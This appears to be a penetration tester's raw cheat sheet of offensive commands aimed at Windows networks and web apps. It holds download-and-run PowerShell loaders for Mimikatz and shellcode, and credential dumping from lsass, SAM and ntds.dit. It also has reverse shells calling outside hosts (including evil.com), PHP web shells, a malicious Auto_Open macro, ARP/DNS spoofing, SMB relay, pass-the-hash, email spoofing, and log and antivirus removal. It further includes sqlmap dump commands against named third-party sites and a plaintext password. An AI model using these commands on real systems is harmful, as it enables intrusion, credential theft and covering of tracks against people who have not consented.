1 | powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds | |
2 | powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks | |
3 | powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Invoke-UserHunter | |
4 | ||
5 | ||
6 | powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Get-NetLocalGroup | |
7 | ||
8 | powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Invoke-EnumerateLocalAdmin | |
9 | ||
10 | ||
11 | powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Invoke-StealthUserHunter | |
12 | powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Find-LocalAdminAccess | |
13 | powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-NinjaCopy.ps1'); Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination "c:\windows\temp\ntds.dit | |
14 | ||
15 | powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Invoke-FileFinder | |
16 | ||
17 | ||
18 | powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/PowerShell/BloodHound.ps1'); | |
19 | ||
20 | ||
21 | BloodHound: | |
22 | powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/PowerShell/BloodHound.ps1');Invoke-Bloodhound -CSVFolder C:\Temp | |
23 | ||
24 | ||
25 | --- | |
26 | powershell_shell: IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); Get-Process lsass | Out-Minidump -DumpFilePath c:\temp | |
27 | ||
28 | meterpreter > download c:\\Windows\\Temp\\lsass_632.dmp | |
29 | ||
30 | python -m SimpleHTTPServer 9000 | |
31 | ||
32 | sekurlsa::Minidump lsassdump.dmp | |
33 | sekurlsa::logonPasswords | |
34 | ||
35 | recon and finding other networks: | |
36 | fping 192.168.0.0/16 | grep -a "alive" | |
37 | ||
38 | ||
39 | ||
40 | --- | |
41 | ||
42 | ||
43 | powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1'); | |
44 | ||
45 | powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.22.45:8080/') | |
46 | ||
47 | ||
48 | reg.exe save hklm\sam c:\temp\sam.save | |
49 | ||
50 | reg.exe save hklm\security c:\temp\security.save | |
51 | ||
52 | reg.exe save hklm\system c:\temp\system.save | |
53 | ||
54 | ||
55 | root@kali:~# nmap 190.57.29.177 -v -Pn -sT -A -oX scan.xml && xsltproc scan.xml -o "`date +%m%d%y`_report.html" | |
56 | ||
57 | ||
58 | ||
59 | ||
60 | ||
61 | BDFproxy: | |
62 | veil option - #50 | |
63 | echo 1 > /proc/sys/net/ipv4/ip_forward | |
64 | ./bdf_proxy.py | |
65 | iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080 | |
66 | iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080 | |
67 | msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 192.168.22.75; set LPORT 4444; set exitonsession false; exploit -j" | |
68 | arpspoof -i eth0 -t target.ip router.ip | |
69 | arpspoof -i eth0 -t router.ip target.ip | |
70 | msfconsole -r bdfproxy_msf_resource.rc | |
71 | ||
72 | ||
73 | nmap -A -oG - 190.57.29.0/24 -p 445 --osscan-guess | grep -a "Windows Server" | |
74 | ||
75 | ||
76 | ||
77 | ||
78 | IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1"); Invoke-Inveigh -ConsoleOutput Y -NBNS Y -ConsoleStatus 1 | |
79 | ||
80 | procdump -ma lsass.exe lsass.dmp | |
81 | ||
82 | powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1’); Get-NetUser -AdminCount | Select name,whencreated,pwdlastset,lastlogon | |
83 | ||
84 | ||
85 | *** | |
86 | sudo msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_https; set LHOST 172.31.18.189; set LPORT 443; set exitonsession false; exploit -j" | |
87 | ||
88 | ||
89 | powershell -nop -windowstyle hidden -NonInteractive -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1');invoke-shellcode -Payload windows/meterpreter/reverse_https -Lhost aws.shellgam3.com -Lport 443" | |
90 | ||
91 | ||
92 | rubber ducky: | |
93 | ||
94 | java -jar duckencode.jar -i "reverse shell.txt" | |
95 | ||
96 | ||
97 | ||
98 | smbrelay: | |
99 | ||
100 | msfconsole -x "use exploit/multi/script/web_delivery; set target 2; set URIPATH /; set payload windows/meterpreter/reverse_tcp; set LHOST 192.168.22.62; set exitonsession false; exploit -j" | |
101 | ||
102 | ./responder.py -I eth0 | |
103 | ||
104 | ./smbrelayx.py -h 192.168.22.151 -c "powershell -nop -exec bypass -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://192.168.22.119:8080/')" | |
105 | ||
106 | "powershell -nop -exec bypass -w hidden -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" | |
107 | ||
108 | pth-winexe -U gp-wks-conf2/Administrator%aad3b435b51404eeaad3b435b51404ee:6154da6030a803632a63b1a0e1a3aeb3 //192.168.22.46 cmd | |
109 | ||
110 | ||
111 | nbtscan -r 192.168.22.0/24 | |
112 | fping -g -d 192.168.23.0/24 2>/dev/null | grep alive | |
113 | ||
114 | capture ntlm handshake (snarf + responder) | |
115 | crack password from handshake (john) | |
116 | password spray to find local admin (metasploit) | |
117 | establish shells with local admin boxes (metasploit) | |
118 | ||
119 | ||
120 | snarf + responder: | |
121 | nodejs snarf.js 192.168.22.62 -d 192.168.22.41 | |
122 | john snarf.pot --rules=all --wordlist=/media/sf_Shared/wordlists/guidant.txt | |
123 | responder -I eth0 | |
124 | ||
125 | find local admin (post exploit): | |
126 | use auxiliary/scanner/smb/smb_login | |
127 | set smbdomain <domain> | |
128 | set smbuser <username> | |
129 | set smbpass <password> | |
130 | set rhosts 0.0.0.0/24 | |
131 | ||
132 | Shell: | |
133 | msfconsole: use exploit/windows/smb/psexec | |
134 | msfconsole: set payload windows/meterpreter/reverse_https | |
135 | run post/windows/gather/smart_hashdump | |
136 | ||
137 | dumping creds/hashes: | |
138 | run post/windows/gather/cachedump | |
139 | run post/windows/gather/smart_hashdump | |
140 | load mimikatz > wdigest | |
141 | ||
142 | cracking hashes: | |
143 | john --format=mscash2 --wordlist=/media/sf_Shared/wordlists/rockyou.txt --rules=all gp_hashes.txt | |
144 | john snarf.pot --rules=all --wordlist=/media/sf_Shared/wordlists/guidant.txt | |
145 | ||
146 | ||
147 | password spraying: | |
148 | http://www.blackhillsinfosec.com/?p=4989 | |
149 | @FOR /F %s in (systems.txt) DO @net use \\%s\C$ /.\Administrator | |
150 | AdminPass 1>NUL 2>&1 && @echo %s>>admin_access.txt && @net use | |
151 | /delete \\%s\C$ > NUL | |
152 | ||
153 | rpcclient: | |
154 | http://carnal0wnage.attackresearch.com/2010/06/more-with-rpcclient.html | |
155 | find local DC first, then -> | |
156 | rpcclient -U "" -N <ip addr of DC> | |
157 | commands: ? | |
158 | ||
159 | xfreerdp /u:jwelkley /p:GoBears1 /d:gp /v:192.168.2.60 /sec:rdp | |
160 | ||
161 | metasploit basics: | |
162 | gain access | |
163 | getuid | |
164 | getpid | |
165 | sysinfo | |
166 | run PS | |
167 | migrate process | |
168 | ||
169 | ||
170 | ||
171 | Reverse Meterpreter Shell: | |
172 | ubuntu@ip-172-31-18-189:/opt/metasploit-framework$ ./msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_https; set LHOST 172.31.18.189; set PORT 8443; run" | |
173 | powershell -nop -windowstyle hidden -NonInteractive -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1');invoke-shellcode -Payload windows/meterpreter/reverse_https -Lhost aws.shellgam3.com -Lport 8443" | |
174 | ||
175 | ||
176 | ||
177 | Dump wireless PSKs: | |
178 | (netsh wlan show profiles) | Select-String “\:(.+)$” | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=”$name” key=clear)} | Select-String “Key Content\W+\:(.+)$” | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | |
179 | ||
180 | DNS subdomain enumeration: | |
181 | dnsrecon -d wabt.com -D /media/sf_Shared/wordlists/SecLists/Discovery/DNS/deepmagic.com_top50kprefixes.txt -t brt -f -n 8.8.8.8 --iw | grep -v 123.123.123.123 | |
182 | ||
183 | ||
184 | ||
185 | ||
186 | ./proxychains4 nmap -p 53 -v -Pn -sS 8.8.8.8 -e eth0 | |
187 | ||
188 | ||
189 | ||
190 | snarf + responder: | |
191 | nodejs snarf.js 192.168.22.62 -d 192.168.22.41 | |
192 | john snarf.pot --rules=all --wordlist=/media/sf_Shared/wordlists/guidant.txt | |
193 | responder -I eth0 | |
194 | ||
195 | MiTM: | |
196 | netstat -nr | |
197 | echo 1 > /proc/sys/net/ipv4/ip_forward | |
198 | arpspoof -i eth0 -t target.ip router.ip | |
199 | arpspoof -i eth0 -t router.ip target.ip | |
200 | ||
201 | MiTM via mitmf: | |
202 | mitmf -i eth0 --arp --spoof --hsts --gateway=10.0.0.1 --target=192.168.0.1 | |
203 | ||
204 | Beef: | |
205 | ./beef | |
206 | mitmf -i eth0 --arp --spoof --hsts --gateway=192.168.0.1 --target=192.168.0.2 --inject --js-url http://192.168.0.5:300/hook.js | |
207 | ||
208 | DNS subdomain brute forcing: | |
209 | dnsrecon -d wpcu.coop -D /media/sf_Shared/wordlists/SecLists/Discovery/DNS/deepmagic.com_top50kprefixes.txt -t brt -f -n 8.8.8.8 --iw | grep -v 123.123.123.123 | |
210 | ||
211 | ||
212 | ||
213 | Certificate injection: | |
214 | mitm + | |
215 | mitmproxy -T --host | |
216 | ||
217 | PtH with Metasploit: | |
218 | Kali: 173.18.131.94 | |
219 | Victim: 173.18.131.111 | |
220 | ||
221 | root@kali:/usr/bin# ./msfconsole | |
222 | msf > use exploit/windows/smb/psexec | |
223 | msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp | |
224 | payload => windows/meterpreter/reverse_tcp | |
225 | msf exploit(psexec) > set lhost 173.18.131.94 | |
226 | lhost => 173.18.131.94 | |
227 | msf exploit(psexec) > set rhost 173.18.131.111 | |
228 | rhost => 173.18.131.111 | |
229 | msf exploit(psexec) > set smbpass 00000000000000000000000000000000:b048b97d9fdb66d3d2ed72b3782847a4 | |
230 | smbpass => 00000000000000000000000000000000:b048b97d9fdb66d3d2ed72b3782847a4 | |
231 | msf exploit(psexec) > set smbuser administrator | |
232 | smbuser => administrator | |
233 | msf exploit(psexec) > set smbdomain test | |
234 | smbdomain => test | |
235 | msf exploit(psexec) > exploit | |
236 | ||
237 | ||
238 | smb relay attack: | |
239 | Metasploit box: 172.17.130.81 | |
240 | Domain Admin Workstation: 172.17.130.33 | |
241 | Target Server: 172.17.130.75 | |
242 | msfconsole -x “use windows/smb/smb_relay; set payload windows/meterpreter/reverse_tcp; set LHOST 172.17.130.81;set SMBHOST 172.17.130.75; set SRVHOST 172.17.130.81; run” | |
243 | -embed in email message: | |
244 | <html> | |
245 | <head> | |
246 | <img src=”\\172.17.130.81\test.jpg”></img> | |
247 | </head> | |
248 | </html> | |
249 | ||
250 | spoofing email via telnet: | |
251 | root@kali:~# telnet mx1.mail.icloud.com 25 | |
252 | Trying 17.158.8.67… | |
253 | Connected to mx1.mail.icloud.com. | |
254 | Escape character is ‘^]’. | |
255 | 220 nk11p00mm-smtpin001.mac.com — Server ESMTP (Oracle Communications Messaging Server 7.0.5.36.0 64bit (built Sep 8 2015)) | |
256 | helo whatever.com | |
257 | 250 nk11p00mm-smtpin001.mac.com OK, 50-197-245-29-static.hfc.comcastbusiness.net [XX.197.XXX.29]. | |
258 | mail from:bob@icloud.com | |
259 | 250 2.5.0 Address Ok. | |
260 | rcpt to:nickvangilder@icloud.com | |
261 | 250 2.1.5 nickvangilder@icloud.com OK. | |
262 | data | |
263 | 354 Enter mail, end with a single “.”. | |
264 | To:Nick VanGilder<nickvangilder@icloud.com> | |
265 | From:Bob Dole<bob@icloud.com> | |
266 | Reply-To:Bob Dole<nickvangilder@outlook.com> | |
267 | Subject:Test | |
268 | ||
269 | This is a test | |
270 | . | |
271 | 250 2.5.0 Ok. | |
272 | ||
273 | check public ip address: | |
274 | proxychains curl ipecho.net/plain | |
275 | ||
276 | powershell | |
277 | import-module activedirectory | |
278 | get-aduser -filter {PasswordNeverExpires -eq $True -AND Enabled -eq $True} -properties PasswordLastSet | Sort PasswordLastSet | Select Distinguishedname,PasswordLastSet | |
279 | ||
280 | ||
281 | on linux box: nc -lvp 8443 | |
282 | powershell -> | |
283 | $client = New-Object System.Net.Sockets.TCPClient("aws.shellgam3.com",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() | |
284 | ||
285 | powershell -nop -exec bypass -file payload.ps1 | |
286 | ||
287 | ||
288 | one-liner: | |
289 | powershell -Command "& {$client = New-Object System.Net.Sockets.TCPClient('192.168.22.63',8443);$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()}" | |
290 | ||
291 | To enumerate all domain controllers: | |
292 | nltest /dclist:domain.local | |
293 | ||
294 | Enumerate local admins: | |
295 | net localgroup Administrators | |
296 | ||
297 | ||
298 | Get-ADDefaultDomainPasswordPolicy | |
299 | net group "domain admins" /domain | |
300 | ||
301 | Fetch a file via HTTP (wget in PowerShell): PS C:\> (New-Object System.Net.WebClient).DownloadFile("http ://10.10.10.10/nc.exe","nc.exe") | |
302 | ||
303 | wmic computersystem get model,name,manufacturer,systemtype | |
304 | ||
305 | ||
306 | File injection: | |
307 | MiTM + | |
308 | iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080 | |
309 | ./mitmproxy -T -s “iframe_injector.py http://www.website.com/files/malicious_file.xlsm; | |
310 | ||
311 | ||
312 | cmdkey.exe /add:MACHINE_NAME_HERE /user:MACHINE_NAME_HERE\Administrator /pass:PASSWORD_HERE | |
313 | cmdkey.exe /delete:MACHINE_NAME_HERE | |
314 | ||
315 | https://download.sysinternals.com/files/PSTools.zip | |
316 | copy file to target | |
317 | psexec \\target -u username -p password cmd.exe | |
318 | start c:\path\payload.vbs | |
319 | ||
320 | ||
321 | Enable RDP: | |
322 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f | |
323 | ||
324 | Disable RDP: | |
325 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f | |
326 | ||
327 | web app recon and scanning: | |
328 | ||
329 | proxychains, proxychains4, torify, tor-resolve | |
330 | service tor start | |
331 | service tor status | |
332 | dont forget to modify /etc/resolv.conf = 127.0.0.1 | |
333 | protect against accidental disclosure = sudo iptables -A OUTPUT --dest <target> -j DROP | |
334 | ||
335 | ||
336 | proxychains nmap -v -sN -n 207.223.121.128 -PN | |
337 | ||
338 | nmap ip.adddress -v -Pn -sT | |
339 | nmap -Sv -T4 hostname.com | |
340 | dirb https://www.example.com | |
341 | grabber --url www.site.com --spider 1 --sql | |
342 | uniscan -d -u test.com | |
343 | /usr/share/zaproxy# java -DsocksProxyHost=127.0.0.1 -DsocksProxyPort=9050 -jar zap-2.4.1.jar | |
344 | nikto -h http://www.site.com | |
345 | whatweb test.com | |
346 | w3af_console | |
347 | wpscan | |
348 | ||
349 | sqlmap --tor --tor-type=SOCKS5 --check-tor --random-agent --risk=3 --level=5 --threads=10 --dbs --dump -D Database_name -T table_name -u http://xxxxx.com/board/board.php?id=6 | |
350 | sqlmap --tor --tor-type=SOCKS5 --check-tor --random-agent --dbs --threads=10 --crawl=2 --risk=3 --level=5 --dump -u http://host.com/board.php?id=6 | |
351 | sqlmap --tor --tor-type=SOCKS5 --check-tor --random-agent --dbs --dump -u https://test.com --sql-shell | |
352 | sqlmap --tor --tor-type=socks5 --check-tor --random-agent --keep-alive --forms --crawl=2 --risk=3 --threads=4 --batch -f --dbs -u https://review.logicforce.com | |
353 | sqlmap --random-agent --keep-alive --level=5 --forms --crawl=2 --risk=3 --threads=10 --batch -f --dump --dbs -u https://xxxxxxx.com | |
354 | ||
355 | sqlmap --random-agent --keep-alive --forms --crawl=2 --risk=3 --threads=10 --level=5 --batch -f --dbs -u http://human.firstcommunitymortgage.com/fha-loans/?gcf_captcha | |
356 | ||
357 | ||
358 | Look for HTTP PUT: | |
359 | curl -X OPTIONS -v http://200.x.x.x/test/ | |
360 | ||
361 | UPLOAD FILE: | |
362 | curl --upload-file /root/Desktop/reverse_shell.php -v --url http://172.17.130.93/test/rshell.php -0 --http1.0 | |
363 | curl -i -X PUT -H "Content-Type: application/xml; charset=utf-8" -d @"/tmp/some-file.xml" http://www.victim.com/newpage | |
364 | curl -X PUT -d "text or data to put" http://www.victim.com/destination_page | |
365 | curl -i -H "Accept: application/json" -X PUT -d "text or data to put" http://victim.com/new_page | |
366 | ||
367 | first put this into cmd.php: | |
368 | <?php echo system($_GET["cmd"]); ?> | |
369 | ||
370 | THEN, for shell access: | |
371 | ||
372 | this one worked: | |
373 | put this in filename.sh | |
374 | ||
375 | http://172.17.130.93/test/cmd.php?cmd=filename.sh | |
376 | $ exec 5<>/dev/tcp/evil.com/8080 | |
377 | $ cat <&5 | while read line; do $line 2>&5 >&5; done | |
378 | ||
379 | Macro enabled xlsm: | |
380 | ubuntu@ip-172-31-18-189:/opt/metasploit-framework$ ./msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_https; set LHOST 172.31.18.189; set PORT 8443; run" | |
381 | ||
382 | Private Sub Auto_Open() | |
383 | strCommand = "powershell -nop -windowstyle hidden -NonInteractive -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1 ');invoke-shellcode -Payload windows/meterpreter/reverse_https -Lhost 52.x.x.123 -Lport 8443" | |
384 | Set WshShell = CreateObject("WScript.Shell") | |
385 | Set WshShellExec = WshShell.Exec(strCommand) | |
386 | End Sub | |
387 | ||
388 | DNS Spoofing: | |
389 | #IP Forwarding | |
390 | echo 1 > /proc/sys/net/ipv4/ip_forward | |
391 | ||
392 | #DNS Port Redirection | |
393 | iptables -A INPUT -i eth0 -p udp --dport 53 -j ACCEPT | |
394 | iptables -A PREROUTING -t nat -i eth0 -p udp --dport 53 -j REDIRECT --to-port 53 | |
395 | ||
396 | #ARP Cache Poisoning / MitM | |
397 | arpspoof -i eth0 -t victimIP routerIP | |
398 | arpspoof -i eth0 -t routerIP victimIP | |
399 | ||
400 | #DNS Spoofing | |
401 | dnschef -i 172.17.130.60 --fakeip=52.37.49.217 --fakedomains=test.com | |
402 | #172.17.130.60 = my internal Kali box | |
403 | #Fake IP = where you want to redirect to | |
404 | #Fake Domains = name of domain to redirect | |
405 | ||
406 | ||
407 | View your current user: whoami | |
408 | View information about the current user: net user myuser (for a local user) | |
409 | net user myuser /domain (for a domain user) | |
410 | View the local groups: net localgroup | |
411 | View the local administrators: net localgroup Administrators | |
412 | Add a new user: net user myuser mypass /add | |
413 | Add a user in the local Administrators group: net localgroup Administrators myuser /add | |
414 | View the domain name of current machine: net config workstation | |
415 | net config server | |
416 | View the name of the domain controller: reg query "HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Windows\ CurrentVersion\Group Policy\ History" /v DCName | |
417 | View the list of domain admins: net group "Domain Admins" /domain | |
418 | View the list of started services (search for antivirus): net start | |
419 | sc query | |
420 | Stop a service: net stop "Symantec Endpoint Protection" | |
421 | View the list of started processes and the owner: tasklist /v | |
422 | Kill a process by its name taskkill /F /IM "cmd.exe" | |
423 | Abort a shutdown/restart countdown shutdown /a | |
424 | Create php backdoor/shell echo ^<?php echo passthru($_GET['cmd']); ?^> > C:\inetpub\wwwroot\s.php | |
425 | View established connections of current machine: netstat -a -n -p tcp | find "ESTAB" | |
426 | View open ports of current machine: netstat -a -n -p tcp | find "LISTEN" | |
427 | netstat -a -n -p udp | |
428 | View network configuration: netsh interface ip show addresses | |
429 | netsh interface ip show route | |
430 | netsh interface ip show neighbors | |
431 | View current network shares: net share | |
432 | Mount a remote share with the rights of the current user: net use K: \\10.1.2.3\C$ | |
433 | dir K: | |
434 | Enable Remote Desktop: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f | |
435 | ||
436 | Blind Files | |
437 | %SYSTEMDRIVE%\boot.ini | |
438 | A file that can be counted on to be on virtually every windows host. Helps with confirmation that a read is happening. | |
439 | %WINDIR%\win.ini | |
440 | ||
441 | This is another file to look for if boot.ini isn’t there or coming back, which is sometimes the case. | |
442 | %SYSTEMROOT%\repair\SAM | |
443 | %SYSTEMROOT%\System32\config\RegBack\SAM | |
444 | It stores users' passwords in a hashed format (in LM hash and NTLM hash). The SAM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods | |
445 | %SYSTEMROOT%\repair\system | |
446 | %SYSTEMROOT%\System32\config\RegBack\system | |
447 | ||
448 | System | |
449 | whoami /all | |
450 | set | |
451 | fsutil fsinfo drives | |
452 | reg query HKLM /s /d /f "C:\* *.exe" | find /I "C:\" | find /V """" | |
453 | ||
454 | ipconfig /all | |
455 | ipconfig /displaydns | |
456 | netstat -nabo | |
457 | netstat -s -p [tcp|udp|icpm|ip] | |
458 | netstat -r | |
459 | netstat -na | findstr :445 | |
460 | netstat -nao | findstr LISTENING | |
461 | netstat -nao | findstr LISTENING | |
462 | netstat -na | findstr LISTENING | |
463 | netsh diag show all | |
464 | ||
465 | net view | |
466 | net view /domain | |
467 | net view /domain:otherdomain | |
468 | net user %USERNAME% /domain | |
469 | net user /domain | |
470 | net accounts | |
471 | net accounts /domain | |
472 | net localgroup administrators | |
473 | net localgroup administrators /domain | |
474 | net group “Domain Admins” /domain | |
475 | net group “Enterprise Admins” /domain | |
476 | net group “Domain Controllers” /domain | |
477 | nbtstat -a [ip here] | |
478 | net share | |
479 | net session | find / “\\” | |
480 | arp -a | |
481 | route print | |
482 | browstat (Not working on XP) | |
483 | netsh wlan show profiles | |
484 | shows all saved wireless profiles. You may then export the info for those profiles with the command below | |
485 | netsh wlan export profile folder=. key=clear | |
486 | netsh wlan [start|stop] hostednetwork | |
487 | netsh wlan set hostednetwork ssid=<ssid> key=<passphrase> keyUsage=persistent|temporary | |
488 | netsh wlan set hostednetwork mode=[allow|disallow] | |
489 | wmic ntdomain list Retrieve information about Domain and Domain Controller | |
490 | ||
491 | ||
492 | gpresult /z | |
493 | sc qc | |
494 | sc query | |
495 | sc queryex | |
496 | type %WINDIR%\System32\drivers\etc\hosts | |
497 | echo %COMSPEC% | |
498 | c:\windows\system32\gathernetworkinfo.vbs | |
499 | tree C:\ /f /a > C:\output_of_tree.txt | |
500 | dir /a | |
501 | dir /b /s [Directory or Filename] | |
502 | dir \ /s /b | find /I “searchstring” | |
503 | ||
504 | %WINDIR%\system32\config\AppEvent.Evt | |
505 | %WINDIR%\system32\config\SecEvent.Evt | |
506 | %WINDIR%\system32\config\default.sav | |
507 | %WINDIR%\system32\config\security.sav | |
508 | %WINDIR%\system32\config\software.sav | |
509 | %WINDIR%\system32\config\system.sav | |
510 | %WINDIR%\system32\CCM\logs\*.log | |
511 | %USERPROFILE%\ntuser.dat | |
512 | %USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat | |
513 | %WINDIR%\System32\drivers\etc\hosts | |
514 | unattend.txt, unattend.xml, sysprep.inf | |
515 | ||
516 | net share \\computername | |
517 | tasklist /V /S computername | |
518 | qwinsta /SERVER:computername | |
519 | qprocess /SERVER:computername * | |
520 | net use \\computername | |
521 | net use \\computername /user:DOMAIN\username password | |
522 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f | |
523 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f | |
524 | net time \\computername (Shows the time of target computer) | |
525 | dir \\computername\share_or_admin_share\ (dir list a remote directory) | |
526 | tasklist /V /S computername | |
527 | Lists tasks w/users running those tasks on a remote system. This will remove any IPC$ connection after it is done so if you are using another user, you need to re-initiate the IPC$ mount | |
528 | ||
529 | WMI | |
530 | wmic bios | |
531 | wmic qfe qfe get hotfixid | |
532 | wmic startupwmic service | |
533 | wmic process get caption,executablepath,commandline | |
534 | wmic process call create “process_name” (executes a program) | |
535 | wmic process where name=”process_name” call terminate (terminates program) | |
536 | wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber (hard drive information) | |
537 | wmic useraccount (usernames, sid, and various security related goodies) | |
538 | wmic useraccount get /ALL | |
539 | wmic share get /ALL (you can use ? to get help) | |
540 | wmic startup list full (this can be a huge list!!!) | |
541 | wmic /node:"hostname" bios get serialnumber (this can be great for finding warranty info about target) | |
542 | ||
543 | reg save HKLM\Security security.hive (Save security hive to a file) | |
544 | reg save HKLM\System system.hive (Save system hive to a file) | |
545 | reg save HKLM\SAM sam.hive (Save sam to a file) | |
546 | reg add [\\TargetIPaddr\] [RegDomain][ \Key ] | |
547 | reg export [RegDomain]\[Key] [FileName] | |
548 | reg import [FileName ] | |
549 | reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!] (you can add /s to recurse all values) | |
550 | ||
551 | Deleting Logs | |
552 | wevtutil el (list logs) | |
553 | wevtutil cl <LogName> (Clear specific log) | |
554 | del %WINDIR%\*.log /a /s /q /f | |
555 | ||
556 | Uninstalling Software “AntiVirus” (Non interactive) | |
557 | wmic product get name /value (this gets software names) | |
558 | wmic product where name="XXX" call uninstall /nointeractive (this uninstalls software) | |
559 | ||
560 | ||
561 | # Other (to be sorted) | |
562 | ||
563 | pkgmgr usefull /iu :”Package” | |
564 | pkgmgr usefull /iu :”TelnetServer” (Install Telnet Service ...) | |
565 | pkgmgr /iu:”TelnetClient” (Client ) | |
566 | rundll32.exe user32.dll, LockWorkStation (locks the screen -invasive-) | |
567 | wscript.exe <script js/vbs> | |
568 | cscript.exe <script js/vbs/c#> | |
569 | ||
570 | ||
571 | Vista/7 | |
572 | ||
573 | winstat features | |
574 | wbadmin get status | |
575 | wbadmin get items | |
576 | gpresult /H gpols.htm | |
577 | bcdedit /export <filename> | |
578 | ||
579 | #Disables the local windows firewall | |
580 | netsh firewall set opmode disable | |
581 | ||
582 | #Enables the local windows firewall. If rules are not in place for your connection, this could cause you to lose it. | |
583 | netsh firewall set opmode enable | |
584 | ||
585 | @FOR /F %n in (users.txt) DO @FOR /F %p in (password.txt) DO @net use \\192.168.200.1 /user:domain\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\192.168.200.1\IPC$ > NUL |